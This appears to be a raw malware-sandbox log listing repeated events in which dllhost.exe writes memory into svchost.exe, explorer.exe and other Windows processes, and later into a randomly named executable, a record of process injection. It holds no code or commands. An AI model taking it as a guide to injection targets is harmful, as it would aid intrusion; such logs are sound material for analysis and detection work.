Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A6612D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dwm.exe base: 2BAAEDC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 26A87990000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 17953770000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2295D530000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 253067D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1845B370000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 26A87990000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 17953770000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2295D530000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 253067D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1845B3A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1ADECD40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D559040000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D559070000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 241A9E70000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CD73160000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2824E860000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 21B473C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 241A9E70000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CD73160000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2824E860000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 21B47B30000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2086F9D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 20870060000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 17183BC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 23FD3F70000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 17183BC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 23FD3FA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D2A4150000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D2A4180000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 275BDF30000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 275BDF60000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1AAC0260000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 203C9F30000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B5645B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C004F60000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 24E2AB40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2644ADB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\spoolsv.exe base: 1990000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 20D25DA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 26EF5350000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B1C2570000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2108BCF0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 29166900000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13FF0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1988D570000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 13869B40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1AAC0260000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E1CC740000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 203C9F30000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2855DA70000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B5645B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2BF199D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 15AF3890000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C004F60000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 21A03B80000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 24E2AB40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\sihost.exe base: 1CD40E40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 151A6530000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 19E29CC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 17D7B150000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BE621A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2252F480000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\ctfmon.exe base: 1F28B540000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B1C2570000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 184683D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2108BCF0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\explorer.exe base: 9070000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1972E260000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13FF0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1988D570000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 221D5930000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 13869B40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D1777C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A633B40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2928D0A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 15AF3890000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 21A03B80000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\sihost.exe base: 1CD40E40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 21C6CF30000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 151A6530000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\audiodg.exe base: 1D349350000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 19E29CC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23B602E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 17D7B150000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BE621A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2252F480000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\ctfmon.exe base: 1F28B540000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 184683D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\explorer.exe base: 9070000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1972E260000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D1777C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A633B40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 21C6CF30000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23B602E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DAC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 2045C3B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 23023330000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A71C3D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dllhost.exe base: 1B6BA880000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 1FA5FEF0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2694B1D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D2E0060000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dllhost.exe base: 1B6BA880000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: BF0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 1FA5FEF0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2694B1D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D2E0060000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1300000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: BF0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 610000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1300000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: E40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 610000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: E90000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: E40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D80000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: E90000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: B50000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D80000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: B70000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: EB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: ED0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: FC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: FE0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1240000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1260000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1210000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1230000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: DB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: DD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: B10000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: B30000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 600000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 620000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 630000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 650000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1130000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1150000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C50000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C70000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 900000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 920000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C70000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C90000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: B00000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: B20000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 5C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 5E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: BD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: BF0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D80000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: DA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1170000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1190000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 5F0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 610000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 5D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 5F0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: F40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: F60000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1230000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1250000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C50000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C70000
